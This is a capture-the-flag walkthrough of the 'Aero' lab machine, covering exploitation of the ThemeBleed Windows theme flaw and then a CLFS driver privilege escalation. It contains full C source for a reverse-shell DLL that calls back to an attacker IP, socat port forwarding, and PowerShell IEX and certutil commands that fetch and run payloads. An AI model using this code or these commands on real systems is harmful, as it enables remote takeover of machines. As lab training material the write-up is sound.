Skip to content

Aero

Port scan

$ sudo nmap 10.10.11.237 -p- --min-rate=10000 -T4 -sCV

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: Aero Theme Hub
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Web app

alt text

We can upload *.theme and *.themepack files to the website.

$ feroxbuster -u http://10.10.11.237/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt --threads=50 -k -C 404

Nothing interesting

A file with the THEMEPACK file extension is a Windows theme pack file. They're created by Windows 7 to apply similarly themed desktop backgrounds, window colors, sounds, icons, cursors, and screensavers.

A .theme file is a .ini text file that is divided into sections, which specify visual elements that appear on a Windows desktop.

ThemeBleed RCE

Google search windows theme exploit and find a RCE exploit.

Background

CVE-2023-38146, known as ThemeBleed, is a vulnerability in Windows Themes that allows for remote code execution. It was patched in the September 2023 Patch Tuesday.

The vulnerability comes from how Windows handles the .msstyles files referenced from within the theme file. These .msstyles files lead to Windows opening a DLL at the same path as the .msstyles path with _vrf.dll appended. The digital signature on this file is checked before it is loaded.

The vulnerability comes because, when version 999 is used, there’s a big gap between the time when the _vrf.dll binary’s signature is checked and when it is loaded for use. This gaps presents a race condition, where the attacker can replace the verified style DLL with a malicious payload to run arbitrary code.

Windows 11 ‘ThemeBleed’ RCE bug gets proof-of-concept exploit

themebleed | GitHub

C reverse shell

main.c

#include <winsock2.h>
#include <windows.h>
#include <io.h>
#include <process.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static int ReverseShell(const char *CLIENT_IP, int CLIENT_PORT) {
    if (strcmp(CLIENT_IP, "0.0.0.0") == 0 || CLIENT_PORT == 0) {
        write(2, "[ERROR] CLIENT_IP and/or CLIENT_PORT not defined.\n", 50);
        return (1);
    }

    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(2 ,2), &wsaData) != 0) {
        write(2, "[ERROR] WSASturtup failed.\n", 27);
        return (1);
    }

    int port = CLIENT_PORT;
    struct sockaddr_in sa;
    SOCKET sockt = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = inet_addr(CLIENT_IP);

    if (connect(sockt, (struct sockaddr *) &sa, sizeof(sa)) != 0) {
        write(2, "[ERROR] connect failed.\n", 24);
        return (1);
    }

    STARTUPINFO sinfo;
    memset(&sinfo, 0, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    sinfo.dwFlags = (STARTF_USESTDHANDLES);
    sinfo.hStdInput = (HANDLE)sockt;
    sinfo.hStdOutput = (HANDLE)sockt;
    sinfo.hStdError = (HANDLE)sockt;
    PROCESS_INFORMATION pinfo;
    CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo);

    return (0);
}

void VerifyThemeVersion()  {
    ReverseShell("10.10.16.3", 4444);
}

$ x86_64-w64-mingw32-gcc-win32 main.c -lws2_32 -shared -o VerifyThemeVersion.dll

$ python -m pefile exports VerifyThemeVersion.dll                     
0x2ab281578 b'VerifyThemeVersion' 1

Download ThemeBleed from this repo and unzip it. Put VerifyThemeVersion.dll in the data folder and change its name to stage_3, then run .\ThemeBleed.exe server.

Since the ThemeBleed.exe is running on my Windows virtual machine, but the reverse shell will reflect to my Kali. I need to connect these two virtual machines.

Note: if the smb service is running on the Wins box, you need to kill it first. (win+R -> services.msc -> server -> right click properties-> disable -> stop -> reboot the box)

Troubleshooting: I cannot ping my Win box from my Kali.

  1. Click on the Start Menu

  2. Go to Control Panel

  3. Open Windows Firewall

  4. Open Advanced Settings

Select Inbound Rules over in the left window pane In the right window pane scroll down to File and Printer Sharing (Echo Request - ICMPv4-In). You will see two of these listed. The first one for enabling this rule to for a domain profile. The second one is for enabling this rule for public/private profile. Unless your PC is on a domain, select the second of these two rules.

  1. Right click your mouse on File and Printer Sharing (Echo Request - ICMPv4-In) Profile: Private, Public and select Enable Rule. --You will now be able to ping your host from either of your virtual machines.

alt text

# On Wins
# make test.theme file and transfer it to my Kali
> .\ThemeBleed.exe make_theme 10.10.16.3 test.theme
> .\ThemeBleed.exe server

# on Kali
# everything comes to 445 will forward to my Wins box
$ sudo socat TCP-LISTEN:445,fork,reuseaddr TCP:192.168.255.136:445

alt text

Then, upload test.theme to the website and get the reverse shell.

# check the if the dll runs correctly
> rundll32 VerifyThemeVersion.dll,VerifyThemeVersion

I checked the DLL file, it ran correctly, and I got a reverse shell from my Win box. But it didn't work when I upload theme file from my Kali. So, I decided use my Win box to pwn this target. But still doesn't work.

Finally, use this repo and get the reverse shell

Jnnshschl/CVE-2023-38146

$ cp VerifyThemeVersion.dll ./CVE-2023-38146/tb/ 
$ cp VerifyThemeVersion.dll Aero.msstyles_vrf_evil.dll

$ python3 themebleed.py -r 10.10.16.3 --no-dll

alt text

I compared the .theme files created by these two different repos. They are same. So, the probably reason might be socat didn't forward 445 port properly. But when I ran the exploit on Wins, it still didn't work, so it might be the repo didn't work on my circumstance.

User sam.emerson

alt text

> $b64 = [Convert]::ToBase64String([IO.FILE]::ReadAllBytes("CVE-2023-28252_Summary.pdf"))

The CVE-2023-28252_Summary.pdf describe the exploit as the name shows.

CVE-2023-28252 | GitHub

.blf file format is handled by the vulnerable Common Log File System driver called CLFS.sys and that is in driver’s folder within system32.

Customize the repo to download a Powershell reverse shell and compile it in Visual Studio.

alt text

I used base64 encoded reverse shell, you also can upload a ps1 file to get the reverse shell.

powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1')

alt text

I can fix that by going into the project settings (right click on clfs_eop in the Solutions Explorer and go to Properties), underConfiguration Properties > Advanced set “Character Set” to “Use Multi-Byte Character Set”. Now on “Rebuild Solution”:

alt text

alt text

alt text

When build clfs_eop.exe, you need to choose release instead of debug.

> certutil -f -urlcache http://10.10.16.3/clfs_eop.exe clfs_eop.exe

alt text

alt text

alt text